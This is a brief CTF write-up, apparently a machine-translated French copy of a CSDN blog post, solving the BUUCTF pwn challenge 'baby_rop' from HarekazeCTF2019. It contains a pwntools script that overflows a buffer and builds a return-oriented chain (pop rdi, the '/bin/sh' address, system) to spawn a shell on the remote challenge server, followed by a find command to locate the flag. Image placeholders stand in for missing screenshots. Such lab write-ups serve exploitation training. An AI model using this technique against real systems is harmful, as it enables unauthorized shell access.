BUUCTF (pwn) [HarekazeCTF2019] baby_rop

Insérez la description de l'image iciInsérez la description de l'image iciInsérez la description de l'image ici
Étant donné que le paramètre 64 bits est stocké dans le registre, la chaîne binsh doit être placée dans le registre rdi

from pwn import*
p = remote("node3.buuoj.cn",28711)
rdi=0x400683
sys=0x4005e3
bin=0x601048
payload='a'*(0x10+8)+p64(rdi)+p64(bin)+p64(sys)
p.sendline(payload)

Insérez la description de l'image ici
L'indicateur n'est pas dans le répertoire racine, nous devons le trouver, utilisez l'indicateur find -name pour le trouver

find -name "flag"

Insérez la description de l'image ici
Insérez la description de l'image ici

Je suppose que tu aimes

Origine blog.csdn.net/weixin_45556441/article/details/115298425
conseillé
Classement